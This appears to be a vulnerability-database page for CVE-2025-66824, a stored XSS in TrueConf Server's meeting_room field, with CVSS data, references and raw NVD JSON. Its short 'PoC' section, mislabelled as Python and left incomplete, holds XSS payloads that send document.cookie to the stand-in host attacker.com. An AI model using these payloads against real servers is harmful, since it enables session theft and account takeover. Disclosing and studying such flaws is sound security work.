CVE-2025-66824

Description

A Stored Cross-Site Scripting (XSS) vulnerability exists in the Meeting location field of the Create/Edit Conference functionality in TrueConf Server v5.5.2.10813. The injected payload is stored via the meeting_room parameter and executed when users visit the Conference Info page, allowing attackers to achieve full Account Takeover (ATO). This issue is caused by improper sanitization of user-supplied input in the meeting_room field.

CVSS Details

CVSS Score

8.7

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:trueconf:server:5.5.2.10813:*:*:*:*:*:*:* - VULNERABLE

TrueConf Server < 5.5.2.10813

TrueConf Server v5.5.2.10813

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-66824 PoC - Stored XSS in TrueConf Server Meeting Location Field
// Target: TrueConf Server v5.5.2.10813
// Attack Vector: meeting_room parameter in Create/Edit Conference functionality

// Step 1: Login to TrueConf Server
const loginEndpoint = 'https://target-trueconf-server/api/auth/login';
const loginData = {
    username: 'attacker_account',
    password: 'attacker_password'
};

// Step 2: Create malicious conference with XSS payload in meeting_room field
const createConferenceEndpoint = 'https://target-trueconf-server/api/conferences/create';
const conferencePayload = {
    conference_name: 'Malicious Conference',
    meeting_room: '<script>fetch("https://attacker.com/log?c="+document.cookie)</script>',
    // Alternative payload for session hijacking
    // meeting_room: '<img src=x onerror="fetch(\'https://attacker.com/steal?data=\'+btoa(document.cookie))">',
    description: 'Test conference for XSS'
};

// Step 3: The XSS payload will execute when any user visits Conference Info page
// Payload example: <script>document.location='https://attacker.com/steal?cookie='+document.cookie</script>

// Mitigation: Input validation and output encoding should be applied to meeting_room field

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-66824
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-66824
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-66824/
[4] VulDB https://vuldb.com/cve/CVE-2025-66824
[5] https://github.com/x00nullbit/CVE-References/blob/main/CVE-2025-66824/README.md
[6] https://trueconf.com
[7] https://github.com/x00nullbit/CVE-References/blob/main/CVE-2025-66824/README.md

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-66824", "sourceIdentifier": "[email protected]", "published": "2025-12-30T19:15:44.580", "lastModified": "2026-01-07T15:41:22.697", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Stored Cross-Site Scripting (XSS) vulnerability exists in the Meeting location field of the Create/Edit Conference functionality in TrueConf Server v5.5.2.10813. The injected payload is stored via the meeting_room parameter and executed when users visit the Conference Info page, allowing attackers to achieve full Account Takeover (ATO). This issue is caused by improper sanitization of user-supplied input in the meeting_room field."}, {"lang": "es", "value": "Una vulnerabilidad de cross-site scripting (XSS) almacenado existe en el campo de ubicación de la reunión de la funcionalidad de Crear/Editar Conferencia en TrueConf Server v5.5.2.10813. La carga útil inyectada se almacena a través del parámetro meeting_room y se ejecuta cuando los usuarios visitan la página de información de la conferencia, permitiendo a los atacantes lograr una toma de control total de la cuenta (ATO). Este problema es causado por una sanitización inadecuada de la entrada proporcionada por el usuario en el campo meeting_room."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 5.8}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:trueconf:server:5.5.2.10813:*:*:*:*:*:*:*", "matchCriteriaId": "8059D00D-F6AA-4CA7-ADCA-32B34F21D726"}]}]}], "references": [{"url": "https://github.com/x00nullbit/CVE-References/blob/main/CVE-2025-66824/README.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://trueconf.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/x00nullbit/CVE-References/blob/main/CVE-2025-66824/README.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}